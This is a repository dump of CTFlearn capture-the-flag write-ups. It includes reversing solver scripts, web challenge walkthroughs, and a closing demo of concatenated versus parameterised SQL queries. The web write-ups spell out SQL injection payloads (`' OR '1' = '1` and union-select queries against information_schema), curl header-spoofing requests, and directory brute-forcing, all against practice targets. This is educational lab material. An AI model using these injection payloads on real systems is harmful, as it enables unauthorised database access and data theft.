# Chunk 2: subtraction, using only the low 32 bits of the second constant
s = hex(0x15764ff46 - (0x4f7fb8ade2f2cef6&0xffffffff))[2:]
param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)]))))
kernel.append(param)

# Chunk 3: addition
s = hex(0x4d998c32ff+0x17d4a53553)[2:]
param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)]))))
kernel.append(param)

# Chunk 4: integer division, with a leading 'B' prepended
s = hex(0x6a8754493837f7d400a77b9be//0xdeb4fa4d998c32ff)[2:]
param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)]))))
param = 'B' + param
kernel.append(param)

# Chunk 5: hex string taken as-is
s = "6574743157"
param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)]))))
kernel.append(param)
flag = '_'.join(kernel)

print("Flag: CTFlearn{" + flag + '}')
--------------------------------------------------------------------------------
/Reverse/Rotterdam Reversing Challenge/sources.zip.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/sources.zip.enc
--------------------------------------------------------------------------------
/Reverse/Rzeszow/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/Flag.png
--------------------------------------------------------------------------------
/Reverse/Rzeszow/Rzeszow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/Rzeszow
--------------------------------------------------------------------------------
/Reverse/Rzeszow/Rzeszow.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/Rzeszow.zip
--------------------------------------------------------------------------------
/Reverse/Rzeszow/exploit.py:
--------------------------------------------------------------------------------
# Candidate flag characters (backslash escaped so Python does not warn about '\|')
flag_comp = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=<>,.?/{}[]\\|~'
# Lookup table taken from the binary
kernelenc = "W8Hj?1VESL^g4xwcvtW%humtEosd$Fq^dXPvi$#sSEe@o618Zl9.5PFrvC%O_E*LB%Igl8qur9SuLAp4MkK#pRzwJHI*Fn9mUs%mGK^RQKO.G*JFJvV%?VJpCpVF9eJuz5&kB!&_VF5DrF?U?jfm&x^9aC7X2(&cGGzbLbOsSOuBeq*ZT%fpc&9riTDO5X%RuTKI@vCqu#CsTAp$Q9WoXJv96.ySdB2EfMK*$NX?.U*aDrfPQQPhFB9cC6y0hMGvbgjBogSux65gTL#Cm9TQt7nTayu9Vr%thh2GnnikE8JnIwlHfreZep^sZ6IrnXT#qu50Lv.Rd_XPDfgwzWcJ3ISjKM!ftRllVyF$?RE_dcJT5&uKZJ!WsqR853uLzcs!8&VyRuTDsiq#6PdmBNlPI$tPi?wZ5$ACCf9yda!OkP.Dc73Nx.Nt1Rj0O.?P!sZDB^d0LN1qXR31!t?OZ#mm7SfZHPO*4gx1J0nyC^d2EKeq^f4h7mSqaIcMv0ZT@G0M"
flag = ''

j = 0
while j < 30:
    # Keep every candidate whose table lookup at this position returns itself
    for i in flag_comp:
        v12 = j
        tmp = ord(i)
        if i == kernelenc[((0xbaadf00d+j) % (v12+pow(tmp, 2)+pow(tmp, 3))) & 0x1ff]:
            flag += i
    j += 3
print("Flag: " + "CTFlearn{" + flag + "}")

--------------------------------------------------------------------------------
/Reverse/Rzeszow/sources.zip.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/sources.zip.enc
--------------------------------------------------------------------------------
/Reverse/The Super Secure Service/Web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/The Super Secure Service/Web1.png
--------------------------------------------------------------------------------
/Web/AudioEdit/Flag1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/AudioEdit/Flag1.png
--------------------------------------------------------------------------------
/Web/AudioEdit/Flag2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/AudioEdit/Flag2.png
--------------------------------------------------------------------------------
/Web/AudioEdit/Web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/AudioEdit/Web1.png
--------------------------------------------------------------------------------
/Web/Basic Injection/README.md:
--------------------------------------------------------------------------------
## Basic Injection
The main idea is finding the flag using basic SQL injection against an insecure web page.

#### Step-1:
After we go to the given URL https://web.ctflearn.com/web4/, we are asked to submit something.

#### Step-2:
Use Inspect Element on the blank field and check the code.

We find a line there.

``

#### Step-3:
When you try all of them, none of them give the flag. So try basic SQL payloads against the existing database.

I tried `' OR '1' = '1`

I got the following output.
```
Name: Luke
Data: I made this problem.
Name: Alec
Data: Steam boys.
Name: Jalen
Data: Pump that iron fool.
Name: Eric
Data: I make cars.
Name: Sam
Data: Thinks he knows SQL.
Name: fl4g__giv3r
Data: th4t_is_why_you_n33d_to_sanitiz3_inputs
Name: snoutpop
Data: jowls
Name: Chunbucket
Data: @datboiiii
```

#### Step-4:

Finally the flag becomes:
`th4t_is_why_you_n33d_to_sanitiz3_inputs`
--------------------------------------------------------------------------------
/Web/Calculat3 M3/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Calculat3 M3/Flag.png
--------------------------------------------------------------------------------
/Web/Calculat3 M3/Inspect.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Calculat3 M3/Inspect.png
--------------------------------------------------------------------------------
/Web/Calculat3 M3/README.md:
--------------------------------------------------------------------------------
## Calculat3 M3
The main idea for finding the flag is the OWASP Top 10.

#### Step-1:
After I visited https://web.ctflearn.com/web7/, the calculator is vulnerable to injection.

#### Step-2:
After I checked Inspect Element, I got the name of the input tag as `expression`.

Please go through this to understand what is happening below and why:
https://owasp.org/www-community/attacks/Command_Injection

#### Step-3:
So, now I opened [Postman](https://www.postman.com/), and tried to change the form of the request from `POST` to `GET`.

#### Step-4:
Finally the flag becomes:
`ctf{watch_0ut_f0r_th3_m0ng00s3}`
--------------------------------------------------------------------------------
/Web/Don't Bump Your Head(er)/README.md:
--------------------------------------------------------------------------------
## Don't Bump Your Head(er)
The main idea for finding the flag is to get it using curl or Burp Suite.

#### Step-1:
I visited the given link: http://165.227.106.113/header.php

#### Step-2:
Then I tried to change the method of the request and see the difference.
`curl -X POST http://165.227.106.113/header.php`

Output:
```bash
Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: curl/7.68.0

```
#### Step-3:
So, now I knew the next header change had to be with the user. So I input
`curl -H "User-Agent: Sup3rS3cr3tAg3nt" http://165.227.106.113/header.php`

Output:
```bash
Sorry, it seems as if you did not just come from the site, "awesomesauce.com".

```

#### Step-4:
So, then I tried to visit the website awesomesauce.com, but it is not hosted on a web server; it is rather used as the site referring to http://165.227.106.113/header.php.

So, I tried to change that also with the header.
`curl -H "User-Agent: Sup3rS3cr3tAg3nt" -H "Referer:awesomesauce.com" http://165.227.106.113/header.php`

Output:
```bash
Here is your flag: flag{did_this_m3ss_with_y0ur_h34d}

```
#### Step-5:
Finally the flag becomes:
`flag{did_this_m3ss_with_y0ur_h34d}`
--------------------------------------------------------------------------------
/Web/Don't Bump Your Head(er)/Web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Don't Bump Your Head(er)/Web1.png
--------------------------------------------------------------------------------
/Web/Gobustme 👻/README.md:
--------------------------------------------------------------------------------
## Gobustme 👻
The main idea is to bruteforce directories and files hidden in a website.

#### Step-1:
We go to the URL https://gobustme.ctflearn.com/ and notice the Ghostbuster theme song, except "Ghostbusters" is replaced with "Gobuster".

#### Step-2:
The site links [Gobuster](https://www.securitynewspaper.com/2019/11/04/bruteforce-any-website-with-gobuster-step-by-step-guide/) which explains what kind of software it is.

#### Step-3:
This is a personal preference, but [DirBuster](https://tools.kali.org/web-applications/dirbuster) is a GUI while Gobuster is a CLI, which makes DirBuster slightly more beginner friendly.

#### Step-4:
At the bottom of the website, [`common.txt`](./common.txt) is provided. This is a wordlist for possible lists to brute force.

#### Step-5:
Set up DirBuster by configuring it to go to the website and use `common.txt` as the wordlist. If your computer can handle it, check off "Go Faster".

#### Step-6:
After running for a bit, DirBuster will give all the results.

#### Step-7:
We can append these results to the end of the website, e.g. for `/call` we'd visit https://gobustme.ctflearn.com/call/

#### Step-8:
Upon visiting `/hide` we see the message "It was well hidden isn't it? CTFlearn{gh0sbu5t3rs_4ever} 👻" which gives us the flag:
`CTFlearn{gh0sbu5t3rs_4ever}`
--------------------------------------------------------------------------------
/Web/Gobustme 👻/results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Gobustme 👻/results.png
--------------------------------------------------------------------------------
/Web/Gobustme 👻/setup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Gobustme 👻/setup.png
--------------------------------------------------------------------------------
/Web/Grid It!/README.md:
--------------------------------------------------------------------------------
## Grid It!
The main idea of finding the flag is SQL Null byte injection.

#### Step-1:
I simply had no idea after the register/login page. I tried capturing packets through Burp Suite and got some cookie with ID patch and we had to resolve the proper Null Byte SQL Injection to get the USER table for admin password.

#### Step-2:
So, I looked up a writeup and finally got this:
https://github.com/terjanq/Flag-Capture/tree/master/Practice/CTFLearn/GridIt

#### Step-3:
Finally, the flag becomes:
`ctflearn{obj3ct_inj3ct1on}`
--------------------------------------------------------------------------------
/Web/Inj3ction Time/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Inj3ction Time/Flag.png
--------------------------------------------------------------------------------
/Web/Inj3ction Time/README.md:
--------------------------------------------------------------------------------
## Inj3ction Time
The main idea for finding the flag is to use progressive SQL exploits to get into the database.

#### Step-1:
After I visited https://web.ctflearn.com/web8/, the following is the list of commands that I input one by one to get the flag. It's progressive and you have to do it by checking corresponding tables and corresponding columns simultaneously.

#### Step-2:
Commands:

```sql
1 union select 1,2,3,4 #
1 union select table_name,2,3,4 from information_schema.tables #
```

After these, we find the `w0w_y0u_f0und_m3` table to access.

#### Step-3:

```sql
1 union select table_name,column_name,3,4 from information_schema.columns #
```
This gives us a column called `f0und_m3`.

This gives us the last command.

```sql
1 union select f0und_m3,2,3,4 from w0w_y0u_f0und_m3 #
```

#### Step-4:
Finally the flag becomes:
`abctf{uni0n_1s_4_gr34t_c0mm4nd}`
--------------------------------------------------------------------------------
/Web/My Blog/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/My Blog/Flag.png
--------------------------------------------------------------------------------
/Web/My Blog/README.md:
--------------------------------------------------------------------------------
## My Blog
The main idea for finding the flag is navigation in Inspect Element.

#### Step-1:

We are given the following message:

    Hi, I'm Noxtal! I have hidden a flag somewhere in my [Cyberworld]
    (https://noxtal.com/) (AKA blog)... you may find a good
    application for your memory. ;)

#### Step-2:
So after visiting this website, we are encountered with this webpage:

#### Step-3:
In the message given by the author, we can clearly see that it hints towards the _application_ segment. I am aware that we have this segment in Inspect Element of the webpage.
So I tried that as follows:

#### Step-4:
I found the flag there:

#### Step-5:
Finally the flag becomes:
`flag{n7f_l0c4l_570r463_15n7_53cur3_570r463}`
--------------------------------------------------------------------------------
/Web/My Blog/Web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/My Blog/Web1.png
--------------------------------------------------------------------------------
/Web/My Blog/Web2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/My Blog/Web2.png
--------------------------------------------------------------------------------
/Web/POST Practice/README.md:
--------------------------------------------------------------------------------
## POST Practice
The main idea is finding the flag using different methods of requests like GET & POST.

#### Step-1:
After going to URL http://165.227.106.113/post.php,

I foremost tried to Inspect Element the page to check out other dependencies of the page.

I got a credential there:
` username: admin | password: 71urlkufpsdnlkadsf`

#### Step-2:

So here is the idea. I tried to do a POST request to get the flag if possible. So I tried with the following command.

```bash
curl -X POST http://165.227.106.113/post.php -d "username=admin&password=71urlkufpsdnlkadsf"
```

#### Step-3:
I got the following output:
```html

flag{p0st_d4t4_4ll_d4y}

```

#### Step-4:

Finally the flag becomes:
`flag{p0st_d4t4_4ll_d4y}`

--------------------------------------------------------------------------------
/Web/POST Practice/Web_Page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/POST Practice/Web_Page.png
--------------------------------------------------------------------------------
/Web/Prehashbrown/Register.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Prehashbrown/Register.png
--------------------------------------------------------------------------------
/Web/Prehashbrown/Search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Prehashbrown/Search.png
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
theme: jekyll-theme-hacker

--------------------------------------------------------------------------------
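
The Basic Injection and Inj3ction Time write-ups above both depend on user input being concatenated into the SQL text. The following is an added example, not part of the repository: it feeds the write-ups' `' OR '1' = '1` and `1 union select 1,2,3,4` inputs to a concatenated query and to a bound-parameter query. The in-memory SQLite database, the table and column names, the function names and the `items` row are assumptions constructed for the demo; the challenges' real schema and backend are not shown on the page.

```python
import sqlite3


def make_db():
    """In-memory SQLite stand-in; schema and rows are constructed for this demo."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE people (name TEXT, data TEXT)")  # assumed names
    db.executemany("INSERT INTO people VALUES (?, ?)", [
        ("Luke", "I made this problem."),
        ("Alec", "Steam boys."),
        ("fl4g__giv3r", "th4t_is_why_you_n33d_to_sanitiz3_inputs"),
    ])
    db.execute("CREATE TABLE items (id INTEGER, a TEXT, b TEXT, c TEXT)")
    db.execute("INSERT INTO items VALUES (1, 'row-1', 'x', 'y')")
    return db


def lookup_vulnerable(db, name):
    # Input is pasted into the SQL text, so a quote in `name` rewrites the
    # WHERE clause instead of being compared as data.
    sql = "SELECT name, data FROM people WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, name):
    # Bound parameter: the driver sends `name` as a value, never as SQL.
    sql = "SELECT name, data FROM people WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()


def item_vulnerable(db, item_id):
    # Numeric context: no quote is needed for the input to extend the query.
    sql = "SELECT id, a, b, c FROM items WHERE id = " + item_id
    return db.execute(sql).fetchall()


def item_safe(db, item_id):
    # Validate the expected type first, then still bind the value.
    if not (item_id.isascii() and item_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, a, b, c FROM items WHERE id = ?"
    return db.execute(sql, (int(item_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the write-ups (trailing '#' comment marker dropped,
    # since SQLite does not treat '#' as a comment).
    for value in ("Luke", "' OR '1' = '1"):
        print(repr(value),
              "concatenated rows:", len(lookup_vulnerable(db, value)),
              "bound rows:", len(lookup_safe(db, value)))
    union_input = "1 union select 1,2,3,4"
    print(repr(union_input),
          "concatenated rows:", len(item_vulnerable(db, union_input)))
    try:
        item_safe(db, union_input)
    except ValueError as exc:
        print("bound query rejected input:", exc)
```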